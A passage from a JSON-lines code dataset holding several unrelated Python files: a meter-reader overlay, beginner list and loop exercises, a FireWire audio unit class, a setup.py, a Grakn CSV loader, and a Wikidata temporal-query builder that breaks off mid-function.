dx\r\n for i, digit_conf in enumerate(self.meter_config[\"register\"][\"digits\"]):\r\n x0, y0, dx, dy = digit_conf[\"roi\"]\r\n if self.confidences[i] < 0.9:\r\n color = (0, 0, 255)\r\n elif self.confidences[i] < 0.995:\r\n color = (33, 137, 235)\r\n else:\r\n color = (56, 245, 39)\r\n \r\n cv2.putText(res, \"%s\" % (str(self.predictions[i]) if self.predictions[i] <= 9 else \"-\"), (x0 + dx // 4, y0 - dy // 4), cv2.FONT_HERSHEY_SIMPLEX, font_size, color, 3, cv2.LINE_AA) \r\n cv2.putText(res, \"%.0f\" % (1e2 * self.confidences[i]), (x0 - dx // 5, y0 - dy), cv2.FONT_HERSHEY_SIMPLEX, 0.8 * font_size, color, 3, cv2.LINE_AA) \r\n\r\n # Stamp\r\n cv2.putText(res, stamp_str, (int(10 * font_size), int(res.shape[0] - 10 * font_size)), cv2.FONT_HERSHEY_SIMPLEX, 0.8 * font_size, color, 3, cv2.LINE_AA) \r\n\r\n self.img_debug = res\r\n\r\nif __name__ == \"__main__\":\r\n pass","repo_name":"ardiloot/automatic-meter-reader","sub_path":"automatic_meter_reader/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25513931677","text":"my_set ={1, 2, 4, 10}\nmy_fav_numbers= my_set\nmy_fav_numbers.add(12)\nmy_fav_numbers.add(18)\nmy_fav_numbers.remove(18)\nprint(my_fav_numbers)\nnew_set = {\"CML\", \"Hindel\", \"Bazel\"}\nfriend_fav_numbers = new_set\nset_3 = friend_fav_numbers | my_fav_numbers\nour_fav_numbers= set_3\nprint(our_fav_numbers)\n\n# Given a tuple which value is integers, is it possible to add more integers to the tuple?\n# No\n\n\nfor number in range(1,21):\n print(number)\n\n# Recap – What is a float? What is the difference between an integer and a float?\n # It is a decimal, and an integer is a whole number.\n# Can you think of another way to generate a sequence of floats?\n # In a list\n #Create a list containing the following sequence 1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5 (don’t hard-code the sequence).\n # list =[\"1.5\", \"2\", \"2.5\", \"3\", \"3.5\", \"4\", \"4.5\", \"5\"]\n #print([float(x) for x in a])\n\nbasket = [\"Banana\", \"Apples\", \"Oranges\", \"Blueberries\"];\nbasket.remove(\"Banana\") \nbasket.remove(\"Blueberries\")\nbasket.append(\"kiwi\")\nbasket.insert(0,\"Apples\")\ncount = basket.count(\"Apples\")\nprint(count)\nbasket.clear()\nprint(basket)\n\nactive = True\nwhile active:\n user_input = input(\"what is your name\")\n if user_input == \"Malka\":\n active = False\n\nmy_list = list(range(1,50))\nfor obj in my_list:\n index = my_list.index(obj)\n if index%2==0:\n print(obj)\n\nfor digit in range(1500, 2501):\n if digit%5==0 and digit%7==0:\n print(digit)\n\nuser_fruits= input(\"List one or more of your favorite fruits with a space in between\")\nlist2 = user_fruits.split(\" \")\nuser_again = input(\"Name any fruit\")\nif user_again in list2:\n print(\"You chose one of your favorite fruits! Enjoy!\")\nelse:\n print(\"You chose a new fruit. I hope you enjoy.\")\n\n\nlist3 =[]\nwhile True:\n pizza_username = input(\"Enter a series of pizza toppings\")\n if \"quit\" == pizza_username:\n break\n toppings = pizza_username.split()\n print(\"I'll add\", toppings, \"to the pizza\")\n list3 += toppings\n \nprint(list3)\ntotal = len(list3)\nprint((total*2.5)+10)\n\nlist4 = []\ntotal = 0\nages = input(\"List each person's age\").split(\",\")\nfor age in ages:\n age= int(age)\n if age < 3:\n ticket = 0\n total+= ticket\n elif age > 3 and age < 12:\n ticket = 10\n total+= ticket\n else:\n ticket = 15\n total+= ticket\nprint(total)\n\nlist5 = []\nteen = [\"Greg\", \"Ashley\", \"Luna\"]\nfor ten in teen:\n restricted= (input(\"How old are you?\"))\n restricted= int(restricted)\n if restricted >= 16 and restricted <= 21:\n list5.append(ten)\nprint(list5)\n\nlist6 = [\"Tom\", \"Harry\", \"John\"]\nfor new_name in list6:\n new_remove = (input(\"How old are you?\"))\n new_remove= int(new_remove)\n if new_remove < 16:\n list6.remove(new_name)\nprint(list6)\n\nsandwich_orders= [\"deli\",\"pastrami\",\"pbj\",\"pastrami\",\"tuna\",\"pastrami\"]\nfinished_sandwiches = []\nprint(\"The deli has run out of pastrami\")\nwhile \"pastrami\" in sandwich_orders:\n sandwich_orders.remove(\"pastrami\")\nfor idx in range(len(sandwich_orders)):\n finished_sandwiches.append(sandwich_orders[idx])\n print(\"I have made your\", sandwich_orders[idx],\"sandwich\")\nfor sandwich in finished_sandwiches:\n if sandwich in sandwich_orders:\n sandwich_orders.remove(sandwich)\nprint(sandwich_orders)\nprint(finished_sandwiches)\n\n\n\n\n \n\n \n","repo_name":"malxdeutsch/di","sub_path":"Week4/Day2/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7106277861","text":"from threading import Thread\nfrom struct import unpack\nfrom time import sleep\n\nimport gi\ngi.require_version('GLib', '2.0')\ngi.require_version('Hinawa', '3.0')\nfrom gi.repository import GLib, Hinawa\n\nfrom hinawa_utils.ta1394.config_rom_parser import Ta1394ConfigRomParser\nfrom hinawa_utils.ta1394.general import AvcConnection\nfrom hinawa_utils.ta1394.streamformat import AvcStreamFormatInfo\n\n__all__ = ['OxfwUnit']\n\n\nclass OxfwUnit(Hinawa.SndUnit):\n def __init__(self, path):\n super().__init__()\n self.open(path)\n if self.get_property('type') != 4:\n raise ValueError('The character device is not for OXFW unit')\n\n ctx = GLib.MainContext.new()\n self.create_source().attach(ctx)\n self.__unit_dispatcher = GLib.MainLoop.new(ctx, False)\n self.__unit_th = Thread(target=lambda d: d.run(), args=(self.__unit_dispatcher, ))\n self.__unit_th.start()\n\n node = self.get_node()\n ctx = GLib.MainContext.new()\n node.create_source().attach(ctx)\n self.__node_dispatcher = GLib.MainLoop.new(ctx, False)\n self.__node_th = Thread(target=lambda d: d.run(), args=(self.__node_dispatcher, ))\n self.__node_th.start()\n\n parser = Ta1394ConfigRomParser()\n info = parser.parse_rom(self.get_node().get_config_rom())\n self.vendor_name = info['vendor-name']\n self.model_name = info['model-name']\n\n self.fcp = Hinawa.FwFcp()\n self.fcp.bind(self.get_node())\n\n self.hw_info = self._parse_hardware_info()\n self.supported_sampling_rates = self._parse_supported_sampling_rates()\n self.supported_stream_formats = self._parse_supported_stream_formats()\n\n def release(self):\n self.fcp.unbind()\n self.__unit_dispatcher.quit()\n self.__node_dispatcher.quit()\n self.__unit_th.join()\n self.__node_th.join()\n\n def __enter__(self):\n return self\n\n def __exit__(self, ex_type, ex_value, trace):\n self.release()\n\n def _parse_hardware_info(self):\n hw_info = {}\n\n req = Hinawa.FwReq()\n\n frames = bytearray(4)\n frames = req.transaction(self.get_node(),\n Hinawa.FwTcode.READ_QUADLET_REQUEST, 0xfffff0050000, 4, frames)\n hw_info['asic-type'] = 'FW{0:x}'.format(\n unpack('>H', frames[0:2])[0] >> 4)\n hw_info['firmware-version'] = '{0}.{1}'.format(frames[2], frames[3])\n\n frames = bytearray(4)\n frames = req.transaction(self.get_node(),\n Hinawa.FwTcode.READ_QUADLET_REQUEST, 0xfffff0090020, 4, frames)\n hw_info['asic-id'] = frames.decode('US-ASCII').rstrip('\\0')\n\n return hw_info\n\n def _parse_supported_sampling_rates(self):\n sampling_rates = {}\n playback = []\n capture = []\n # Assume that PCM playback is available for all of models.\n for rate in AvcConnection.SAMPLING_RATES:\n if AvcConnection.ask_plug_signal_format(self.fcp, 'input', 0, rate):\n playback.append(rate)\n sleep(0.02)\n # PCM capture is not always available depending on models.\n for rate in AvcConnection.SAMPLING_RATES:\n if AvcConnection.ask_plug_signal_format(self.fcp, 'output', 0, rate):\n capture.append(rate)\n self._playback_only = (len(capture) == 0)\n for rate in AvcConnection.SAMPLING_RATES:\n if rate in playback or rate in capture:\n sampling_rates[rate] = True\n return sampling_rates\n\n def _parse_supported_stream_formats(self):\n supported_stream_formats = {}\n supported_stream_formats['playback'] = \\\n AvcStreamFormatInfo.get_formats(self.fcp, 'input', 0)\n if len(supported_stream_formats['playback']) == 0:\n supported_stream_formats['playback'] = \\\n self._assume_supported_stram_formats('input', 0)\n self._assumed = True\n else:\n self._assumed = False\n if not self._playback_only:\n supported_stream_formats['capture'] = \\\n AvcStreamFormatInfo.get_formats(self.fcp, 'output', 0)\n if len(supported_stream_formats['capture']) == 0:\n supported_stream_formats['capture'] = \\\n self._assume_supported_stram_formats('output', 0)\n return supported_stream_formats\n\n def _assume_supported_stram_formats(self, direction, plug):\n assumed_stream_formats = []\n fmt = AvcStreamFormatInfo.get_format(self.fcp, 'input', 0)\n for rate, state in self.supported_sampling_rates.items():\n if state:\n assumed = {\n 'sampling-rate': rate,\n 'rate-control': fmt['rate-control'],\n 'formation': fmt['formation']}\n assumed_stream_formats.append(assumed)\n return assumed_stream_formats\n\n def set_stream_formats(self, playback, capture):\n if playback not in self.supported_stream_formats['playback']:\n raise ValueError('Invalid argument for playback stream format')\n if capture:\n if self._playback_only:\n raise ValueError('This unit is playback only')\n if capture not in self.supported_stream_formats['capture']:\n raise ValueError('Invalid argument for capture stream format')\n if playback['sampling-rate'] != capture['sampling-rate']:\n raise ValueError(\n 'Sampling rate mis-match between playback and capture')\n if self._assumed:\n rate = playback['sampling-rate']\n AvcConnection.set_plug_signal_format(self.fcp, 'output', 0, rate)\n AvcConnection.set_plug_signal_format(self.fcp, 'input', 0, rate)\n else:\n AvcStreamFormatInfo.set_format(self.fcp, 'input', 0, playback)\n if not self._playback_only:\n AvcStreamFormatInfo.set_format(self.fcp, 'output', 0, capture)\n\n def get_current_stream_formats(self):\n playback = AvcStreamFormatInfo.get_format(self.fcp, 'input', 0)\n if not self._playback_only:\n capture = AvcStreamFormatInfo.get_format(self.fcp, 'output', 0)\n else:\n capture = None\n return {'playback': playback, 'capture': capture}\n","repo_name":"takaswie/hinawa-utils","sub_path":"hinawa_utils/oxfw/oxfw_unit.py","file_name":"oxfw_unit.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"96"} +{"seq_id":"24797926304","text":"from setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='d3wordcloud',\n version='0.0.1',\n description='A simple Jupyter (Lab/Notebook) port of Jason Davies d3 JS wordcloud generator https://www.jasondavies.com/wordcloud/',\n py_modules=[\"d3wordcloud\"],\n package_dir={'': 'src'},\n extras_require={\n \"dev\": [\n \"ipython\",\n \"check-manifest\",\n \"twine\"\n ]\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\"\n ],\n python_requires='>=3',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Dominik Weckmüller\",\n author_email=\"dominik@geo.rocks\",\n url=\"https://github.com/do-me/d3wordcloud\"\n)","repo_name":"do-me/d3wordcloud","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"32136197836","text":"# the Python client for Grakn\n# https://github.com/graknlabs/client-python\nfrom grakn.client import GraknClient\n\n# Python's built in module for dealing with .csv files.\n# we will use it read data source files.\n# https://docs.python.org/3/library/csv.html#dialects-and-formatting-parameters\nimport csv\n\n\ndef build_my_graph(inputs, data_path, keyspace_name):\n \"\"\"\n gets the job done:\n 1. creates a Grakn instance\n 2. creates a session to the targeted keyspace\n 3. for each input:\n - a. constructs the full path to the data file\n - b. loads csv to Grakn\n :param input as list of dictionaties: each dictionary contains details required to parse the data\n \"\"\"\n with GraknClient(uri=\"localhost:48555\") as client: # 1\n with client.session(keyspace=keyspace_name) as session: # 2\n for input in inputs:\n input[\"file\"] = input[\"file\"].replace(data_path, \"\") # for testing purposes\n input[\"file\"] = data_path + input[\"file\"] # 3a\n print(\"Loading from [\" + input[\"file\"] + \".csv] into Grakn ...\")\n load_data_into_grakn(input, session) # 3b\n\n\ndef load_data_into_grakn(input, session):\n \"\"\"\n loads the csv data into our Grakn phone_calls keyspace:\n 1. gets the data items as a list of dictionaries\n 2. for each item dictionary\n a. creates a Grakn transaction\n b. constructs the corresponding Graql insert query\n c. runs the query\n d. commits the transaction\n :param input as dictionary: contains details required to parse the data\n :param session: off of which a transaction will be created\n \"\"\"\n items = parse_data_to_dictionaries(input) # 1\n\n for item in items: # 2\n with session.transaction().write() as transaction: # a\n graql_insert_query = input[\"template\"](item) # b\n print(\"Executing Graql Query: \" + graql_insert_query)\n transaction.query(graql_insert_query) # c\n transaction.commit() # d\n\n print(\"\\nInserted \" + str(len(items)) +\n \" items from [ \" + input[\"file\"] + \".csv] into Grakn.\\n\")\n\n##\n# Attribute insert definitions\n#\n#\ndef hour_template(hours):\n # insert integers\n return 'insert $num isa hour; $num \"'+ hours[\"num\"] + '\";'\n\ndef minute_template(mins):\n # insert integers\n return 'insert $num isa minute; $num \"'+ mins[\"num\"] + '\";'\n\ndef second_template(secs):\n # insert boolean\n return 'insert $num isa second; $num \"'+ secs[\"num\"] + '\";'\n\ndef remain_template(remrem):\n # insert boolean\n return 'insert $num isa remainder; $num '+ remrem[\"rem\"] + ';'\n\n\n\n##\n# Relationship insert definitions\n\ndef addh_template(addh):\n # match addee\n graql_insert_query = 'match $addee isa hour; $addee \"' + addh[\"addee\"] + '\";'\n # match addor\n graql_insert_query += ' $addor isa hour; $addor \"' + addh[\"addor\"] + '\";'\n # match resnum\n graql_insert_query += ' $resnum isa hour; $resnum \"' + addh[\"resnum\"] + '\";'\n # match remres\n graql_insert_query += ' $remres isa hour; $remres \"' + addh[\"remres\"] + '\";'\n # match remnum\n graql_insert_query += ' $remnum isa remainder; $remnum ' + addh[\"remnum\"] + ';'\n # match remrem\n graql_insert_query += ' $remrem isa remainder; $remrem ' + addh[\"remrem\"] + ';'\n # insert addi\n graql_insert_query += \" insert (addeeh: $addee, addorh: $addor, resulth: $resnum, remresh: $remres, resrem: $remnum, remrem: $remrem) isa addhour;\"\n return graql_insert_query\n \n\ndef addm_template(addm):\n # match addee\n graql_insert_query = 'match $addee isa minute; $addee \"' + addm[\"addee\"] + '\";'\n # match addor\n graql_insert_query += ' $addor isa minute; $addor \"' + addm[\"addor\"] + '\";'\n # match resnum\n graql_insert_query += ' $resnum isa minute; $resnum \"' + addm[\"resnum\"] + '\";'\n # match remres\n graql_insert_query += ' $remres isa minute; $remres \"' + addm[\"remres\"] + '\";'\n # match remnum\n graql_insert_query += ' $remnum isa remainder; $remnum ' + addm[\"remnum\"] + ';'\n # match remrem\n graql_insert_query += ' $remrem isa remainder; $remrem ' + addm[\"remrem\"] + ';'\n # insert addi\n graql_insert_query += \" insert (addeem: $addee, addorm: $addor, resultm: $resnum, remresm: $remres, resrem: $remnum, remrem: $remrem) isa addmin;\"\n return graql_insert_query\n\ndef adds_template(adds):\n # match addee\n graql_insert_query = 'match $addee isa second; $addee \"' + adds[\"addee\"] + '\";'\n # match addor\n graql_insert_query += ' $addor isa second; $addor \"' + adds[\"addor\"] + '\";'\n # match resnum\n graql_insert_query += ' $resnum isa second; $resnum \"' + adds[\"resnum\"] + '\";'\n # match remres\n graql_insert_query += ' $remres isa second; $remres \"' + adds[\"remres\"] + '\";'\n # match remnum\n graql_insert_query += ' $remnum isa remainder; $remnum ' + adds[\"remnum\"] + ';'\n # match remrem\n graql_insert_query += ' $remrem isa remainder; $remrem ' + adds[\"remrem\"] + ';'\n # insert addi\n graql_insert_query += \" insert (addees: $addee, addors: $addor, results: $resnum, remress: $remres, resrem: $remnum, remrem: $remrem) isa addsec;\"\n return graql_insert_query\n \n\n\ndef parse_data_to_dictionaries(input):\n \"\"\"\n 1. reads the file through a stream,\n 2. adds the dictionary to the list of items\n :param input.file as string: the path to the data file, minus the format\n :returns items as list of dictionaries: each item representing a data item from the file at input.file\n \"\"\"\n items = []\n with open(input[\"file\"] + \".csv\") as data: # 1\n for row in csv.DictReader(data, skipinitialspace=True):\n item = {key: value for key, value in row.items()}\n items.append(item) # 2\n return items\n\n\nInputs = [\n {\n \"file\": \"numh\",\n \"template\": hour_template\n },\n {\n \"file\": \"numm\",\n \"template\": minute_template\n },\n {\n \"file\": \"nums\",\n \"template\": second_template\n },\n {\n \"file\": \"remain\",\n \"template\": remain_template\n },\n {\n \"file\": \"addh\",\n \"template\": addh_template\n },\n {\n \"file\": \"addm\",\n \"template\": addm_template\n },\n {\n \"file\": \"adds\",\n \"template\": adds_template\n }\n]\n\nif __name__ == \"__main__\":\n build_my_graph(inputs=Inputs, data_path=\"data\\\\\", keyspace_name = \"time_trial\")\n","repo_name":"brettforbes/gTime","sub_path":"2_migrate_csv.py","file_name":"2_migrate_csv.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"40043272631","text":"import collections\nimport csv\nimport datetime\nimport json\nimport os\nimport random\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport sling\nimport tensorflow as tf\nfrom tqdm import tqdm\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\"out_dir\", None, \"Path to store constructed queries.\")\nflags.DEFINE_string(\n \"facts_file\", None,\n \"File containing facts with qualifiers extracted from `sling2facts.py`.\")\nflags.DEFINE_string(\"sling_kb_file\", None, \"SLING file containing wikidata KB.\")\nflags.DEFINE_string(\n \"sling_wiki_mapping_file\", None,\n \"SLING file containing mapping from QID to english wikipedia pages.\")\nflags.DEFINE_integer(\n \"min_year\", 2010,\n \"Starting year to construct queries from. Only facts which have a start / \"\n \"end date after this will be considered.\")\nflags.DEFINE_integer(\"max_year\", 2020,\n \"Ending year to construct queries up till.\")\nflags.DEFINE_integer(\n \"max_subject_per_relation\", 1000,\n \"Maximum number of subjects to retain per relation. Subjects are sorted \"\n \"based on popularity before filtering.\")\nflags.DEFINE_float(\"train_frac\", 0.2,\n \"Fraction of queries to hold out for training set.\")\nflags.DEFINE_float(\"val_frac\", 0.1,\n \"Fraction of queries to hold out for validation set.\")\n\nrandom.seed(42)\nY_TOK = \"_X_\"\nWIKI_PRE = \"/wp/en/\"\n\n\ndef _datetup2int(date):\n \"\"\"Convert (year, month, day) to integer representation.\n\n Args:\n date: Tuple of (year, month, day).\n\n Returns:\n an int of year * 1e4 + month * 1e2 + day.\n \"\"\"\n dint = date[0] * 1e4\n dint += date[1] * 1e2 if date[1] else 0\n dint += date[2] if date[2] else 0\n return dint\n\n\ndef date_in_interval(date, start, end):\n \"\"\"Check if date is within start and end.\n\n Args:\n date: Tuple of (year, month, day).\n start: Start date (year, month, day).\n end: End date (year, month, day).\n\n Returns:\n a bool of whether start <= date <= end.\n \"\"\"\n date_int = _datetup2int(date)\n start_int = _datetup2int(start) if start else 0\n end_int = _datetup2int(end) if end else 21000000\n return date_int >= start_int and date_int <= end_int\n\n\ndef parse_date(date_str):\n \"\"\"Try to parse date from string.\n\n Args:\n date_str: String representation of the date.\n\n Returns:\n date: Tuple of (year, month, day).\n \"\"\"\n date = None\n try:\n if len(date_str) == 4:\n date_obj = datetime.datetime.strptime(date_str, \"%Y\")\n date = (date_obj.year, None, None)\n elif len(date_str) == 6:\n date_obj = datetime.datetime.strptime(date_str, \"%Y%m\")\n date = (date_obj.year, date_obj.month, None)\n elif len(date_str) == 8:\n date_obj = datetime.datetime.strptime(date_str, \"%Y%m%d\")\n date = (date_obj.year, date_obj.month, date_obj.day)\n except ValueError:\n pass\n if date is not None and date[0] > 2100:\n # Likely an error\n date = None\n return date\n\n\ndef load_sling_mappings(sling_kb_file, sling_wiki_mapping_file):\n \"\"\"Loads entity names, number of facts and wiki page titles from SLING.\n\n Args:\n sling_kb_file: kb.sling file generated from SLING wikidata processor.\n sling_wiki_mapping_file: mapping.sling file generated from SLING 'en'\n wikipedia processor.\n\n Returns:\n qid_names: dict mapping wikidata QIDs to canonical names.\n qid_mapping: dict mapping wikidata QIDs to wikipedia page titles.\n qid_numfacts: dict mapping wikidata QIDs to number of facts.\n \"\"\"\n # Load QID names.\n logging.info(\"Extracting entity names and num-facts from SLING KB.\")\n commons = sling.Store()\n commons.load(sling_kb_file)\n commons.freeze()\n qid_names = {}\n qid_numfacts = {}\n total = 0\n for f in commons:\n total += 1\n if \"name\" in f:\n if isinstance(f.name, sling.String):\n qid_names[f.id] = f.name.text()\n elif isinstance(f.name, bytes):\n qid_names[f.id] = f.name.decode(\"utf-8\", errors=\"ignore\")\n elif isinstance(f.name, str):\n qid_names[f.id] = f.name\n else:\n logging.warn(\"Could not read name of type %r\", type(f.name))\n ln = len(f)\n qid_numfacts[f.id] = ln\n logging.info(\"Processed %d QIDs out of %d\", len(qid_names), total)\n # Load QID mapping.\n logging.info(\"Extracting entity mapping to Wikipedia from SLING.\")\n commons = sling.Store()\n commons.load(sling_wiki_mapping_file)\n commons.freeze()\n qid_mapping = {}\n for f in commons:\n try:\n if \"/w/item/qid\" in f:\n pg = f.id[len(WIKI_PRE):] if f.id.startswith(WIKI_PRE) else f.id\n qid_mapping[f[\"/w/item/qid\"].id] = pg\n except UnicodeDecodeError:\n continue\n logging.info(\"Extracted %d mappings\", len(qid_mapping))\n return qid_names, qid_mapping, qid_numfacts\n\n\ndef read_facts(facts_file, qid_mapping, min_year):\n \"\"\"Loads facts and filters them using simple criteria.\n\n Args:\n facts_file: File containing wikidata facts with qualifiers.\n qid_mapping: dict mapping wikidata QIDs to wikipedia page titles.\n min_year: An int. Only facts with a start / end year greater than this will\n be kept.\n\n Returns:\n all_facts: list of tuples, where each tuple is a fact with\n (relation, subject, object, start, end).\n \"\"\"\n logging.info(\"Reading facts from %s\", facts_file)\n all_facts = []\n with tf.io.gfile.GFile(facts_file) as f:\n for line in tqdm(f):\n fact = line.strip().split(\"\\t\")\n # Skip boring properties.\n if not fact[0].startswith(\"P\"):\n continue\n # Skip instance of facts.\n if fact[0] == \"P31\":\n continue\n # Skip facts where object is not an entity.\n if not fact[2].startswith(\"Q\"):\n continue\n # Skip facts whose subject and objects are not wiki pages.\n if fact[1] not in qid_mapping or fact[2] not in qid_mapping:\n continue\n # Get date qualifiers.\n start, end = None, None\n for qual in fact[3:]:\n if not qual:\n continue\n elems = qual.split(\"=\")\n # Skip inherited qualifier.\n if elems[0].endswith(\"*\"):\n continue\n if len(elems) != 2:\n continue\n if elems[0].startswith(\"P580\"):\n start = parse_date(elems[1])\n elif elems[0].startswith(\"P582\"):\n end = parse_date(elems[1])\n if start is None and end is None:\n continue\n # Skip facts whose start and end are both before min_date.\n if ((start is None or start[0] < min_year) and\n (end is None or end[0] < min_year)):\n continue\n all_facts.append(fact[:3] + [start, end])\n logging.info(\"Loaded total %d facts\", len(all_facts))\n return all_facts\n\n\ndef read_templates():\n \"\"\"Loads relation-specific templates from `templates.csv`.\n\n Returns:\n a dict mapping relation IDs to string templates.\n \"\"\"\n my_path = os.path.dirname(os.path.realpath(__file__))\n template_file = os.path.join(my_path, \"templates.csv\")\n logging.info(\"Reading templates from %s\", template_file)\n reader = csv.reader(tf.io.gfile.GFile(template_file))\n headers = next(reader, None)\n data = collections.defaultdict(list)\n for row in reader:\n for h, v in zip(headers, row):\n data[h].append(v)\n templates = dict(zip(data[\"Wikidata ID\"], data[\"Template\"]))\n logging.info(\"\\n\".join(\"%s: %s\" % (k, v) for k, v in templates.items()))\n return templates\n\n\ndef resolve_objects(facts):\n \"\"\"Combine consecutive objects across years into one fact.\n\n Args:\n facts: A list of fact tuples.\n\n Returns:\n a list of fact tuples with consecutive facts with the same object merged.\n \"\"\"\n\n def _datekey(fact):\n start = _datetup2int(fact[3]) if fact[3] else 0\n end = _datetup2int(fact[4]) if fact[4] else 21000000\n return (start, end)\n\n # First sort by start time and then by end time.\n sorted_facts = sorted(facts, key=_datekey)\n # Merge repeated objects into one.\n out_facts = [sorted_facts[0]]\n for fact in sorted_facts[1:]:\n if (fact[2] == out_facts[-1][2] and fact[3] != fact[4] and\n out_facts[-1][3] != out_facts[-1][4]):\n out_facts[-1][4] = fact[4]\n else:\n out_facts.append(fact)\n return out_facts\n\n\ndef _map_years_to_objects(facts, qid_numfacts, min_year, max_year):\n \"\"\"Map each year between min, max to the corresponding object in facts.\n\n Args:\n facts: a list of facts with the same subject and relation.\n qid_numfacts: a dict mapping wikidata QIDs to number of facts.\n min_year: an int, starting year to map.\n max_year: an int, ending year to map.\n\n Returns:\n year2obj: a dict mapping each year between (min_year, max_year) to the\n corresponding most 'popular' object for that year.\n \"\"\"\n year2obj = {}\n numfacts = lambda x: qid_numfacts.get(x, 0)\n for f in facts:\n min_ = f[3][0] if f[3] is not None else min_year\n max_ = f[4][0] if f[4] is not None else max_year\n min_ = max(min_, min_year)\n max_ = min(max_, max_year)\n for yr in range(min_, max_ + 1):\n if yr in year2obj:\n # Keep the more popular object.\n if numfacts(year2obj[yr]) < numfacts(f[2]):\n year2obj[yr] = f[2]\n else:\n year2obj[yr] = f[2]\n return year2obj\n\n\ndef _build_example(query):\n \"\"\"Creates a tf.Example for prediction with T5 from the input query.\n\n Args:\n query: a dict mapping query features to their values.\n\n Returns:\n a tf.train.Example consisting of the query features.\n \"\"\"\n # Inputs and targets.\n inp = query[\"query\"].encode(\"utf-8\")\n trg = query[\"answer\"][\"name\"].encode(\"utf-8\")\n # Metadata.\n id_ = query[\"id\"].encode(\"utf-8\")\n recent = query[\"most_recent_answer\"][\"name\"].encode(\"utf-8\")\n frequent = query[\"most_frequent_answer\"][\"name\"].encode(\"utf-8\")\n rel = query[\"relation\"].encode(\"utf-8\")\n # Construct TFRecord.\n feature = {\n \"id\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[id_])),\n \"date\":\n tf.train.Feature(\n int64_list=tf.train.Int64List(value=[int(query[\"date\"])])),\n \"relation\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[rel])),\n \"query\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[inp])),\n \"answer\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[trg])),\n \"most_frequent_answer\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[frequent])),\n \"most_recent_answer\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[recent])),\n }\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\n\ndef create_queries(out_dir, all_facts, templates, qid_names, qid_numfacts,\n min_year, max_year, train_frac, val_frac,\n max_subject_per_relation):\n \"\"\"Construct queries for most popular subjects for each relation.\n\n Args:\n out_dir: Path to store all queries as well as yearly slices.\n all_facts: a list of facts.\n templates: a dict mapping relation IDs to templates.\n qid_names: dict mapping wikidata QIDs to canonical names.\n qid_numfacts: dict mapping wikidata QIDs to number of facts.\n min_year: an int, starting year to map.\n max_year: an int, ending year to map.\n train_frac: a float, fraction of subjects to reserve for the train set.\n val_frac: a float, fraction of subjects to reserve for the val set.\n max_subject_per_relation: number of subjects to keep per relation.\n \"\"\"\n\n def _create_entity_obj(qid):\n return {\"wikidata_id\": qid, \"name\": qid_names[qid]}\n\n def _create_implicit_query(subj, tmpl):\n return tmpl.replace(\"\", qid_names[subj]).replace(\"\", Y_TOK)\n\n def _most_frequent_answer(year2obj):\n counts = collections.defaultdict(int)\n for _, obj in year2obj.items():\n counts[obj] += 1\n return max(counts.items(), key=lambda x: x[1])[0]\n\n def _most_recent_answer(yr2obj):\n recent = max(yr2obj.keys())\n return yr2obj[recent]\n\n # Group by relation and by sort by subject\n logging.info(\"Keeping only facts with templates.\")\n rel2subj = {}\n for fact in tqdm(all_facts):\n if fact[0] not in templates:\n continue\n if fact[0] not in rel2subj:\n rel2subj[fact[0]] = {}\n if fact[1] not in rel2subj[fact[0]]:\n rel2subj[fact[0]][fact[1]] = []\n rel2subj[fact[0]][fact[1]].append(fact)\n\n logging.info(\"Sorting subjects by 'popularity' resolving multiple objects.\")\n sorted_rel2subj = {}\n for relation in rel2subj:\n sorted_subjs = sorted(\n rel2subj[relation].keys(),\n key=lambda x: qid_numfacts.get(x, 0),\n reverse=True)\n sorted_rel2subj[relation] = [\n (s, resolve_objects(rel2subj[relation][s])) for s in sorted_subjs\n ]\n\n logging.info(\"Keep only subjects with multiple objects.\")\n total_facts = 0\n filt_rel2subj = {}\n for rel, subj2facts in sorted_rel2subj.items():\n filt_subj2facts = list(filter(lambda x: len(x[1]) > 1, subj2facts))\n if filt_subj2facts:\n filt_rel2subj[rel] = filt_subj2facts\n total_facts += sum([len(f) for _, f in filt_rel2subj[rel]])\n logging.info(\"# facts after filtering = %d\", total_facts)\n\n logging.info(\"Keep only %d subjects per relation, split into train/val/test\",\n max_subject_per_relation)\n train_queries, val_queries, test_queries = [], [], []\n tot_queries, tot_subj = 0, 0\n for relation, subj2facts in filt_rel2subj.items():\n num_subj = 0\n for subj, facts in subj2facts:\n year2obj = _map_years_to_objects(facts, qid_numfacts, min_year, max_year)\n p = random.random() # to decide which split this subject belongs to.\n for yr, obj in year2obj.items():\n query = {\n \"query\":\n _create_implicit_query(subj, templates[relation]),\n \"answer\":\n _create_entity_obj(obj),\n \"date\":\n str(yr),\n \"id\":\n subj + \"_\" + relation + \"_\" + str(yr),\n \"most_frequent_answer\":\n _create_entity_obj(_most_frequent_answer(year2obj)),\n \"most_recent_answer\":\n _create_entity_obj(_most_recent_answer(year2obj)),\n \"relation\":\n relation,\n }\n if p < train_frac:\n train_queries.append(query)\n elif p < train_frac + 